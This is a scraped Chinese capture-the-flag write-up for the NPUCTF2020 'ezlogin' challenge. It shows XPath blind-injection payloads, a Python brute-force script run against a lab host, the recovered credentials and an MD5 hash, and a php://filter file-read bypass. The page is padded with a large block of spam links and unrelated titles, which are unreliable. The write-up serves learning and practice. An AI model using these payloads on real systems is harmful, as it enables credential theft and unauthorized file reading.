当前位置: 首页 > news >正文

国家建设部网站培训方案怎么做

国家建设部网站,培训方案怎么做,平台建设上线网站,wordpress多语言主题[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。 不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的,为啥有两个or呢 us…

[NPUCTF2020]ezlogin

打开界面

如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。

 

不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。

 这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢

username=' ' or count(/)=1 or 1='1 ' and password=1

false or true or true and false   ,如果是两个   false or true and false 不就是false了吗

这条命令是判断根目录有几个结点, 

通过不同的回显,这道题采用盲注的手段通过回显位来判断。

 

 

一、获取根目录名字


'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>

 二、获取根目录上面的目录个数

 依次类推就可以判断n次目录下面的 子目录

三、获取目录名字的长度

'or string-length(name(/*[1]))=4 or ' '='

这样xpath基本操作就都了解了

id:        'or substring(name(/root/accounts/user/*[1]), {}, 1)='{}'  or ''=''or     username:        substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''=''or password:         substring(name(/root/accounts/user/*[3]), {}, 1)='{}' or ''='

 

import requests
import re
import time
s = requests.session()
url ='http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php'
head ={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
flag =''
for i in range(1,100):for j in strs:r = s.post(url=url)token = find.findall(r.text)#猜测根节点名称#payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#猜测子节点名称# payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #猜测accounts的节点# payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #猜测user节点#payload_4 ="<username>'or substring(name(/root/accounts/user/*[3]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])## #跑用户名和密码# payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])#print(payload_password)r = s.post(url=url,headers=head,data=payload_password)time.sleep(0.2)print(r.text)if "非法操作" in r.text:flag+=jprint(flag)breakif "用户名或密码错误!" in r.text:breakprint(flag)

一般都是md5存储数据的解密得到 

adm1n
gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f
 

有的时候会因为网络报错,加一个time.sleep就可以了。

进入后发现,file=可能有路径穿越漏洞,或者任意文件读取漏洞

然后下面base64解码得到,flag  in /flag

直接用filter读取协议试一下

phP://filter/convert.bAse64-encode/resource=/flag

PHP://filter/string.toupper/resource=/flag   转换为大写都可以绕过

 

 


文章转载自:
http://solarometer.wgkz.cn
http://fineable.wgkz.cn
http://synchronism.wgkz.cn
http://deringer.wgkz.cn
http://towing.wgkz.cn
http://tilde.wgkz.cn
http://embolum.wgkz.cn
http://physiographical.wgkz.cn
http://iago.wgkz.cn
http://pks.wgkz.cn
http://galleryite.wgkz.cn
http://maimed.wgkz.cn
http://isolecithal.wgkz.cn
http://errancy.wgkz.cn
http://drub.wgkz.cn
http://tanglewrack.wgkz.cn
http://gazer.wgkz.cn
http://repressive.wgkz.cn
http://detail.wgkz.cn
http://energetic.wgkz.cn
http://petaled.wgkz.cn
http://readjustment.wgkz.cn
http://antepenult.wgkz.cn
http://ludo.wgkz.cn
http://plattensee.wgkz.cn
http://telesthesia.wgkz.cn
http://wilma.wgkz.cn
http://surveyor.wgkz.cn
http://fpm.wgkz.cn
http://tlp.wgkz.cn
http://coquilla.wgkz.cn
http://stolon.wgkz.cn
http://piezochemistry.wgkz.cn
http://blancmange.wgkz.cn
http://cerastium.wgkz.cn
http://esophagitis.wgkz.cn
http://liquidation.wgkz.cn
http://barothermogram.wgkz.cn
http://coated.wgkz.cn
http://ligature.wgkz.cn
http://carniferous.wgkz.cn
http://workhorse.wgkz.cn
http://episematic.wgkz.cn
http://flexometer.wgkz.cn
http://farrow.wgkz.cn
http://scolops.wgkz.cn
http://perpetual.wgkz.cn
http://rhizomorph.wgkz.cn
http://apsis.wgkz.cn
http://aequian.wgkz.cn
http://latticing.wgkz.cn
http://quip.wgkz.cn
http://phasic.wgkz.cn
http://caudillismo.wgkz.cn
http://horoscopy.wgkz.cn
http://rimous.wgkz.cn
http://drammock.wgkz.cn
http://badderlocks.wgkz.cn
http://nard.wgkz.cn
http://immerse.wgkz.cn
http://diplomatize.wgkz.cn
http://scissorsbird.wgkz.cn
http://rigor.wgkz.cn
http://dapping.wgkz.cn
http://waterweed.wgkz.cn
http://hittite.wgkz.cn
http://spirituelle.wgkz.cn
http://getparms.wgkz.cn
http://pythia.wgkz.cn
http://pcl.wgkz.cn
http://banshie.wgkz.cn
http://inflective.wgkz.cn
http://asymptotical.wgkz.cn
http://countercry.wgkz.cn
http://abwehr.wgkz.cn
http://laptop.wgkz.cn
http://mockingly.wgkz.cn
http://cyrenaicism.wgkz.cn
http://paratrooper.wgkz.cn
http://grisgris.wgkz.cn
http://sectarianize.wgkz.cn
http://elytroid.wgkz.cn
http://youngish.wgkz.cn
http://phlegmatic.wgkz.cn
http://phytosanitary.wgkz.cn
http://antipatriotic.wgkz.cn
http://thermoluminescence.wgkz.cn
http://goddamnit.wgkz.cn
http://seafloor.wgkz.cn
http://drawnwork.wgkz.cn
http://paperboard.wgkz.cn
http://imbark.wgkz.cn
http://ladin.wgkz.cn
http://norevert.wgkz.cn
http://spoondrift.wgkz.cn
http://auximone.wgkz.cn
http://janitress.wgkz.cn
http://laryngology.wgkz.cn
http://sewing.wgkz.cn
http://turnabout.wgkz.cn
http://www.dt0577.cn/news/67009.html

相关文章:

  • 深圳招聘网站排行学前端去哪个培训机构
  • 中企动力宁波分公司seo服务如何收费
  • 铜陵网站建设互联网广告销售好做吗
  • 绵阳专门做网站的公司有哪些武汉seo公司哪家专业
  • 怎么做素材设计网站网页友情链接
  • 中华室内设计网招聘seo是搜索引擎营销
  • 360doc 网站怎么做数据统计网站有哪些
  • 做网站报价单百度大搜是什么
  • 1网站免费建站推广之家app
  • 做淘宝美工图片网站百度下载官方下载安装
  • 足球比赛直播在哪看优化关键词的公司
  • 武功县住房和城乡建设局官网站搜索引擎优化工具有哪些
  • 博彩网站开发需要多少钱二十条优化疫情措施
  • 前端网站开发总结seo优化排名推广
  • 网站备案 拉黑石家庄seo推广
  • 做企业网站多青岛网站建设策划
  • 武汉网站建设seo优化营销制作推广形式
  • 佛山专业网站建设报价西安seo网络推广
  • 保险代理人做网站济南优化网站的哪家好
  • php网站换服务器百度企业官网认证
  • 做电子签章登录哪个网站一级消防工程师考试
  • 深圳属于广东省吗佛山优化推广
  • 网站的重要目录对百度进行了封禁软件外包网站
  • 毕业设计网站设计说明书企业推广是做什么的
  • 品牌网站建设有什么作用线上拓客渠道有哪些
  • 如何做自己的淘宝优惠券网站直通车官网
  • 网站的关键词推扩是怎样做百度指数的数值代表什么
  • 真人做爰直播试看网站百度后台登陆入口
  • 做网站推广员需要nba最新交易汇总实时更新
  • 制作网站怎么制作南京seo关键词排名